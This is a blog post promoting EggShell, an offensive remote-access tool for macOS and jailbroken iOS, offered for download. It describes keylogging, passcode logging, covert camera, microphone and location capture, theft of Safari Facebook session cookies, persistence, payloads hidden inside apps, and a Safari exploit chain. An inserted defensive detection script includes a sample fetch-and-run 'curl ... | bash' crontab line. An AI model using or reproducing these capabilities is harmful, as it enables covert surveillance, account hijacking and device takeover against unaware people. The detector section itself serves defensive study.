Fi8sVrs

EggShell - iOS/macOS Remote Administration Tool

Brief Overview

EggShell (formerly NeonEggShell) was a project I started in August of 2015. It is a remote control pentest tool written in Python. After trying out Metasploit's “Meterpreter”, I decided to create a better, native, secure, and easier tool with most, if not more, commands for macOS and jailbroken iOS devices. This tool creates a bash payload that spawns a command line session with the target, including extra functionality like downloading files, taking pictures, location tracking, and dozens of other commands. EggShell also has the functionality to handle and switch between multiple targets. Communication between server and target is encrypted with AES.

Encrypted Communication

All data sent between the server and target is encrypted with 128-bit AES. This means files, pictures, and commands are encrypted end to end. The server and the payload each hold the same shared key; that shared key is used only to encrypt the random AES session key that actually protects the traffic. The random session key is generated anew each time the server script is started.

Getting Started

To use EggShell, you must have pycrypto and Python 2.7.x installed.

 

Install using git: (macOS/Linux)

git clone https://github.com/neoneggplant/EggShell
cd EggShell
python eggshell.py

Create And Run A Payload

 

Using the menu, we can choose to create a bash payload; this is what will be run on the target machine. It is a two-stage payload: it first connects to our EggShell server, downloads a shell script, and tells the server what kind of device it is; it then connects back once more to download and execute the binary.

Screen-Shot-2016-10-13-at-12.43.52-PM.pn

 

Example: running the created payload on our target

Screen-Shot-2016-10-13-at-1.03.59-PM.png

 

Back on our server, we can see that we received a connection and an EggShell session has been started!

 

Screen-Shot-2016-10-13-at-1.13.06-PM.png

 

macOS Commands

ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
picture : take picture through iSight camera
getpid : get process id
openurl : open url through the default browser
idletime : get the amount of time since the keyboard/cursor were touched
getpaste : get pasteboard contents
mic : record microphone
brightness : adjust screen brightness
exec : execute command
persistence : attempts to connect back every 60 seconds
rmpersistence : removes persistence

 

iOS Commands

sysinfo : get system information
ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
frontcam : take picture through front camera
backcam : take picture through back camera
mic : record microphone
getpid : get process id
vibrate : make device vibrate
alert : make alert show up on device
say : make device speak
locate : get device location
respring : respring device
setvol : set mediaplayer volume
getvol : view mediaplayer volume
isplaying : view mediaplayer info
openurl : open url on device
dial : dial number on device
battery : get battery level
listapps : list bundle identifiers
open : open app
persistence : installs LaunchDaemon – tries to connect every 30 seconds
rmpersistence : uninstalls LaunchDaemon
installpro : installs eggshellpro to device

 

EggShellPro Commands (Cydia Substrate Extension)

lock : simulate lock button press
wake : wake device from sleeping state
home : simulate home button press
doublehome : simulate home button double press
play : plays music
pause : pause music
next : next track
prev : previous track
getpasscode : log successful passcode attempts
unlock : unlock with passcode
keylog : log keystrokes
keylogclear : clear keylog data
locationservice: turn on or off location services

 

EggShell Pro

EggShell Pro is a Cydia Substrate library that takes advantage of the system functions in iOS. With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is the ability to log the passcode that was used to unlock the iPhone. When interacting with an iOS device, simply run “installpro”; the dylib file will be uploaded to the device, followed by a respring.

 

Screen-Shot-2017-02-21-at-3.36.39-PM.png

 

Navigating/Downloading Files

EggShell has a command-line-like feel to it. Using the Unix-like commands built into EggShell, we can print the working directory (pwd), list a directory (ls), remove files (rm), and change directories (cd). With these commands we can navigate the file system just as we would from a shell. Using the download command we can download any file over our encrypted connection. In the example below, we step through a directory and download a PDF file from the target machine.

 

Screen-Shot-2016-10-18-at-6.49.01-PM.png

 

Taking Pictures

Taking a photo with the “picture” command on macOS will activate the iSight camera and send the image data back to the server. To take a picture on iOS, use “frontcam” or “backcam”.

 

Screen-Shot-2016-10-22-at-8.45.46-PM.png

 

iOS Location Tracking Even With Location Services Off

EggShellPro lets us send commands to toggle location services on or off. This means that even if location services are off, we can turn them on, retrieve the location of the device, and then quickly turn location services off again.

 

Screen-Shot-2016-11-21-at-1.39.20-AM.png

 

We get the coordinates of the exact spot the device is currently in, along with a convenient Google Maps link.

 

Screen-Shot-2016-11-21-at-1.40.52-AM.png

 

iOS Getting Passcode

EggShellPro hooks into the lock screen functions and logs every successful passcode entry, keeping the device's passcode in memory. When we run “getpasscode” we are sent back the passcode that was last used to unlock the device.

 

Screen-Shot-2016-11-21-at-2.13.42-AM.png

 

macOS Hijacking Safari Facebook Sessions

With the getfacebook command, a special function in EggShell parses Safari's binary cookie store. Because Safari's binary cookies are stored unencrypted, we can easily leak the Facebook c_user and xs cookies and use them to log in from another browser.

 

Screen-Shot-2016-11-21-at-2.21.55-AM.png

 

Screen-Shot-2016-11-21-at-2.29.19-AM.png

 

macOS Persistence

To achieve persistence, even without being root, the “persistence” command adds the payload to the user's crontab. It attempts to reconnect every 60 seconds, even after a reboot. To remove persistence, simply enter “rmpersistence” and it should remove itself from the crontab.
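As an added defensive example (this is not EggShell code and not from the original post), the following script applies the two persistence indicators the text gives, a crontab entry that reconnects every 60 seconds on macOS and a LaunchDaemon with a 30-second StartInterval on jailbroken iOS, to constructed sample input. The page does not show EggShell's actual crontab line or plist, so the sample entries, the `com.example.placeholder` label, the file paths and `PLACEHOLDER_HOST` are all made up for illustration; the heuristics (every-minute schedule, short StartInterval, an interpreter launched from a user-writable path, output piped into a shell) are general ones that would also catch other cron- or launchd-based reconnect jobs.

```python
import plistlib
import re

# Constructed sample user crontab (not taken from EggShell): one benign nightly
# job and two every-minute jobs that re-launch a script, which is the shape a
# cron-based reconnect takes. Paths and host name are made-up placeholders.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/tmutil startbackup
* * * * * /bin/bash /Users/alice/.hidden/stage.sh >/dev/null 2>&1
*/1 * * * * curl -s http://PLACEHOLDER_HOST/s | bash
"""

# Constructed LaunchDaemon plist with a hypothetical label, modelled on the
# "tries to connect every 30 seconds" behaviour described in the text.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.placeholder</string>
  <key>ProgramArguments</key>
  <array><string>/bin/bash</string><string>/var/mobile/.stage.sh</string></array>
  <key>StartInterval</key><integer>30</integer>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

# An interpreter or downloader being invoked ...
INTERPRETER_RE = re.compile(r"(^|/)(bash|sh|zsh|python\d*|perl|curl)\b")
# ... on a path a non-root user can write to (macOS home dirs, iOS mobile user, tmp).
USER_WRITABLE_RE = re.compile(r"(/Users/[^/\s]+|/var/mobile|/private/tmp|/tmp)/")
# Output of an earlier command piped straight into a shell.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba)?sh\b")


def parse_crontab(text):
    """Return (schedule, command) pairs; skips comments, blank lines and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue
        if line.startswith("@"):  # @reboot, @hourly, ... have a one-token schedule
            sched, _, cmd = line.partition(" ")
            entries.append((sched, cmd.strip()))
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            entries.append((" ".join(parts[:5]), parts[5]))
    return entries


def command_reasons(command):
    """Indicators that apply to the command string of either a cron job or a launchd job."""
    reasons = []
    if INTERPRETER_RE.search(command) and USER_WRITABLE_RE.search(command):
        reasons.append("interpreter run on user-writable path")
    if PIPE_TO_SHELL_RE.search(command):
        reasons.append("pipes downloaded content into a shell")
    return reasons


def crontab_findings(text):
    """Flag cron entries that fire every minute or match the command indicators."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if schedule.split()[0] in ("*", "*/1"):
            reasons.append("runs every minute")
        reasons += command_reasons(command)
        if reasons:
            findings.append({"source": "crontab", "entry": command, "reasons": reasons})
    return findings


def launchd_findings(plist_bytes, max_interval=60):
    """Flag a launchd job whose StartInterval is at most max_interval seconds or whose command is suspicious."""
    job = plistlib.loads(plist_bytes)
    command = " ".join(job.get("ProgramArguments", []))
    reasons = []
    interval = job.get("StartInterval")
    if isinstance(interval, int) and 0 < interval <= max_interval:
        reasons.append("StartInterval of %ds" % interval)
    reasons += command_reasons(command)
    if not reasons:
        return []
    return [{"source": "launchd:" + job.get("Label", "?"), "entry": command, "reasons": reasons}]


if __name__ == "__main__":
    for f in crontab_findings(SAMPLE_CRONTAB) + launchd_findings(SAMPLE_PLIST):
        print(f["source"], "|", f["entry"], "|", "; ".join(f["reasons"]))
```

On a real host the same functions would be fed the output of `crontab -l` for each user and the contents of each plist under the LaunchDaemons and LaunchAgents directories; the every-minute and short-interval checks are deliberately noisy, so treat hits as items to review rather than as verdicts.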

Recording Audio

Using the “mic record” command, we can asynchronously record audio on both iOS and macOS. This means we can record through the mic while running other commands. When we are finished recording, simply run “mic stop”; this stops the audio recording and downloads the audio data.

 

Screen-Shot-2016-10-18-at-6.41.21-PM.png

 

Handling Multiple Sessions

With the built-in “MultiServer” feature, we can listen for multiple connections. Below is an example with two connections from the same device; the same works with multiple devices.

 

Screen-Shot-2016-10-18-at-6.35.27-PM.png

 

As targets connect, we can use “sessions” to list all the active sessions, “interact” to interact with a session, “close” to close a session by number, and “back” to return to the MultiServer console.

Payloads In Apps

Payloads can easily be added inside apps. Below is an example of using the “system()” function to call our payload, still in just one line. This method can be used on both macOS and jailbroken iOS.

 

Screen-Shot-2016-10-22-at-9.19.03-PM.png

 

Immediately after running the app, our payload is run and, just as expected, we have a connection.

 

Screen-Shot-2016-10-22-at-9.26.48-PM.png

 

Safari Exploit + EggShell

Soon after iOS security researcher Luca Todesco released his browser-based 9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from Safari. Below is my video demonstration featured on EverythingApplePro.

Original Video
Thanks For Viewing

lucasjackson5815@gmail.com

Download: EggShell-master.zip

 

Source: http://lucasjackson.me/index.php/eggshell/
